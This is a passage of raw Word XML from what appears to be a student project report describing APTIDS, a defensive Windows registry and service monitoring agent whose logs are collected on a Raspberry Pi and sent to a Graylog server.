            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> trojan.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>2.2.6.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>In Windows NT operating systems, a Windows service is a computer program that operates in the background. Windows services can be configured to start when the operating system is started and run in the background as long as Windows is running. Alternatively, they can be started manually or by an event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:lastRenderedPageBreak/>
        <w:t>Identifying Vulnerable Network Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Many computers and network devices are deployed with default or improper configurations that expose them to various attacks. In some cases, the simple observation of a given protocol may indicate vulnerability.  Protocols such as Virtual Local Area Network (VLAN) trunking, network routing, and network redundancy protocols typically should not be propagated to the client. This is because an attacker with access to these protocols may be able to manipulate the flow of traffic across the network, expand access to other subnets, or cause denial of service.</w:t>
      </w:r>
      <w:r w:rsidR="007D073C">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215BF8" w:rsidRPr="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00CA1AEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc485303724"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PROJECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E445CE">
        <w:t xml:space="preserve"> ARCHITECTURE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="0031762B" w:rsidRDefault="00E445CE" w:rsidP="008625D0">
      <w:r>
        <w:t xml:space="preserve">In this chapter, we would like to present about APTIDS, its functionalities </w:t>
      </w:r>
      <w:r w:rsidR="00DE075B">
        <w:t>its correlated modules those join the operation</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc485303725"/>
      <w:r>
        <w:t>APTIDS’s overall architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="00DE075B" w:rsidRDefault="00DE075B" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE075B">
        <w:t>Overview of System Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D44C6" w:rsidRDefault="005D44C6" w:rsidP="005D44C6">
      <w:r>
        <w:t>The overall architecture of APTIDS comprises 3 main components:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D44C6" w:rsidRDefault="005D44C6" w:rsidP="005D44C6">
      <w:r w:rsidRPr="00FD35FB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APTIDS.exe</w:t>
      </w:r>
      <w:r w:rsidR="00394749">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00394749">
        <w:t>which is known as APTIDS agent,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs in the background of the current system for monitoring</w:t>
      </w:r>
      <w:r w:rsidR="00394749">
        <w:t xml:space="preserve"> malicious activities </w:t>
      </w:r>
      <w:r>
        <w:t>predefined in the modules’ configuration files. APTIDS.exe comprises 4 main modules helping its operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63473" w:rsidRDefault="00F63473" w:rsidP="00F63473">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD35FB">
        <w:t>Registry Monitoring Module</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used for monitoring malicious activities, it monitors activities that create and modify values and subkeys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63473" w:rsidRDefault="00F63473" w:rsidP="00F63473">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD35FB">
        <w:t>Service Monitoring Module</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used to monitor activities that create or delete specific services in the Windows Service Database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63473" w:rsidRDefault="00F63473" w:rsidP="00F63473">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD35FB">
        <w:t>Sentry Forensic Module</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used in case there is any compromise that has been identified and notified by the operation of Registry Monitoring Module and Service Monitoring Module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63473" w:rsidRDefault="00F63473" w:rsidP="00F63473">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD35FB">
        <w:t>Logging Module</w:t>
      </w:r>
      <w:r w:rsidR="00FD35FB">
        <w:t xml:space="preserve"> is used to send log data to Distributed Log Collector Hardware (DLCH). When Registry Module and Service Module notify an event that modifies Registry and Service Database, they log this activity out to their specific log files. Logging Module reads those files, then sends log information to DLCH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD35FB" w:rsidRPr="00FD35FB" w:rsidRDefault="00FD35FB" w:rsidP="00FD35FB">
      <w:r w:rsidRPr="00394749">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Distributed Log Collector Hardware</w:t>
      </w:r>
      <w:r w:rsidR="00394749">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (DLCH)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a log collector server which is implemented on a small and open-source hardware such as Raspberry Pi.</w:t>
      </w:r>
      <w:r w:rsidR="00394749">
        <w:t xml:space="preserve"> This server is responsible for receiving connection from APTIDS agents. DLCH collects log data and waiting for Graylog Collector Sidecar, which is an agent for collecting log and send to Graylog server in Centralized Log Storage System.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394749" w:rsidRDefault="00394749" w:rsidP="005D44C6">
      <w:r w:rsidRPr="00394749">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (CLSS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a Graylog server runs as a SIEM which stores, manages and can be used to search for log information.</w:t>
      </w:r>
      <w:r w:rsidR="001C31D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC3737">
        <w:t>Administrators can base on the information displayed in Graylog Server’s interface for knowing which critical events happened in the current monitored systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260497" w:rsidRDefault="00260497">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260497" w:rsidRDefault="00260497" w:rsidP="005D44C6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The figure below demonstrates APTIDS architecture and its components.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377E30" w:rsidRDefault="00FE6346" w:rsidP="00377E30">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68AB0B8E" wp14:editId="7B39AF1C">
            <wp:extent cx="5581650" cy="5630545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>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1650" cy="5630545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377E30" w:rsidRPr="00572008" w:rsidRDefault="00377E30" w:rsidP="00377E30">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00572008">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> APTIDS Overall Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00580F86" w:rsidRPr="00580F86" w:rsidRDefault="00580F86" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580F86">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>We run APTIDS.exe, which is a module for monitor malicious activities, on the System needed to be Protected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00580F86" w:rsidRPr="00580F86" w:rsidRDefault="00580F86" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580F86">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>APTIDS.exe starts 2 threads for monitoring Registry and Windows Services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00580F86" w:rsidRPr="00580F86" w:rsidRDefault="00580F86" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>APTIDS.exe start Registry Module thread for monitoring activities adding or modifying subkeys and values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00580F86" w:rsidRPr="00580F86" w:rsidRDefault="00580F86" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>APTIIDS.exe calls Service Module for monitoring activities adding or deleting Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00580F86" w:rsidRPr="00580F86" w:rsidRDefault="00580F86" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>When identify any suspicious activities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00580F86" w:rsidRPr="00580F86" w:rsidRDefault="00580F86" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Registry Module calls Logging Module for writing log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00580F86" w:rsidRPr="00580F86" w:rsidRDefault="00580F86" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Service Module calls Logging Module for writing log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00580F86" w:rsidRDefault="00572008" w:rsidP="00572008">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Logging Module calls a function for sending log data to DLCH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00572008" w:rsidRDefault="00572008" w:rsidP="00572008">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar collects the log data from specified log files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00572008" w:rsidRDefault="00572008" w:rsidP="00572008">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Administrator views the log information display by Graylog server for notifying any suspicious activities or known compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00572008" w:rsidRPr="00580F86" w:rsidRDefault="00572008" w:rsidP="00572008">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Response team use Sentry Forensic Toolkit for identifying any APT threat to isolate and terminate it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00580F86" w:rsidRPr="00580F86" w:rsidRDefault="00580F86" w:rsidP="00580F86">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C6026" w:rsidRPr="00580F86" w:rsidRDefault="004C6026" w:rsidP="00580F86">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc485303726"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00CC0C0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD03D9">
        <w:t>Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:r w:rsidR="00E2646F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2D3D" w:rsidRDefault="00F10476" w:rsidP="00E90A36">
      <w:r>
        <w:t>After getting into the system operations, a</w:t>
      </w:r>
      <w:r w:rsidR="00CA6920">
        <w:t>ttacker usually wants to leave a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> persistent running program </w:t>
      </w:r>
      <w:r w:rsidR="00CA6920">
        <w:t xml:space="preserve">for running at system boot. Deploying a malware for manipulating and controlling system operations, as well as doing espionage tasks, attacker also adds that system into his bot network. When being run on a system, a malware executes it operations for completing the pre-defined tasks. One of its operation is maintain a persistent executable that helps run the malware at system startup. Malware chooses Windows Registry as one of its possible hive to hide its configurations and executable program file path </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1997150461"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00CA6920">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00CA6920">
            <w:instrText xml:space="preserve"> CITATION Sik12 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00CA6920">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00CA6920">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(20)</w:t>
          </w:r>
          <w:r w:rsidR="00CA6920">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00CA6920">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003B1B5E">
        <w:t xml:space="preserve">Therefore, to detect that any malicious executable program that has written its configurations and executable file path in to Registry Hive, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B1B5E">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B1B5E">
        <w:t xml:space="preserve"> deploy a real-time monitor application that always monitors the Registry for any pre-defined change, and alert upon those critical change. Though this approach leads to high rate of false-positive alarm, however it also concludes we will not miss any critical event happened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2D3D" w:rsidRDefault="0051408A" w:rsidP="006867D5">
      <w:r>
        <w:t>There are some Registry keys that store the information for executable programs those want to start the system boot. In this case, APTIDS implements a solution for monitoring these essential keys for detecting any change happening, and triggers alert to administrators. In monitoring registry operations, we have developed APTIDS for detecting Registry</w:t>
      </w:r>
      <w:r w:rsidR="00CC0C0B">
        <w:t xml:space="preserve"> keys and values that are added, modified or value data that has been modified, in the Registry hive. </w:t>
      </w:r>
      <w:r w:rsidR="003B1B5E">
        <w:t>Since a deleted Registry key is not as harmful to system operations as an added malicious key, and since system has abilities to recover from any essential key that has been deleted which make the system unable to boot, we do not deploy a function for detecting operation that delete Registry keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D36EB" w:rsidRDefault="009D36EB">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CC0C0B" w:rsidRDefault="00CC0C0B" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc485303727"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Monitor Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="00CC0C0B" w:rsidRDefault="000A7B42" w:rsidP="00CC0C0B">
      <w:r>
        <w:t xml:space="preserve">The Registry Monitor Architecture can be </w:t>
      </w:r>
      <w:r w:rsidR="00782346">
        <w:t>graphically present in the following figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004113CB" w:rsidRDefault="00C51A1A" w:rsidP="004113CB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74046B5B" wp14:editId="72E4CAFE">
            <wp:extent cx="5581650" cy="6040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650" cy="6040755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782346" w:rsidRPr="004113CB" w:rsidRDefault="004113CB" w:rsidP="004113CB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc485303772"/>
      <w:r w:rsidRPr="004113CB">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3</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2</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004113CB">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registry Monitor architecture diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w:rsidR="00BD03D9" w:rsidRDefault="00BD03D9" w:rsidP="00BD03D9">
      <w:r>
        <w:t>“APTIDS.exe” is a program that runs at background of an operating system. APTIDS then creates a thread for Registry Monitor when running. Registry Monitor run as an independent thread that real-time performs operations for detecting any critical change to the pre-defined registry keys those are defined in a configuration file called “RegConfig.conf”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD03D9" w:rsidRDefault="00BD03D9">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD03D9" w:rsidRPr="00DE075B" w:rsidRDefault="00BD03D9" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc485303728"/>
      <w:r w:rsidRPr="00DE075B">
        <w:lastRenderedPageBreak/>
        <w:t>Registry Monitor Workflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="00BD03D9" w:rsidRDefault="00BD03D9" w:rsidP="00BD03D9">
      <w:r>
        <w:t>APTIDS.exe takes “RegMon” as an argument function for starting an independent thread. RegMon then runs in background performing real-time Registry Monitor operations</w:t>
      </w:r>
      <w:r w:rsidR="00311405">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0082423F">
        <w:t>present in figure 3.1</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004113CB" w:rsidRPr="004113CB" w:rsidRDefault="004113CB" w:rsidP="00BD03D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RegMon is run as an independent thread by APTIDS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004113CB" w:rsidRPr="004113CB" w:rsidRDefault="004113CB" w:rsidP="00BD03D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
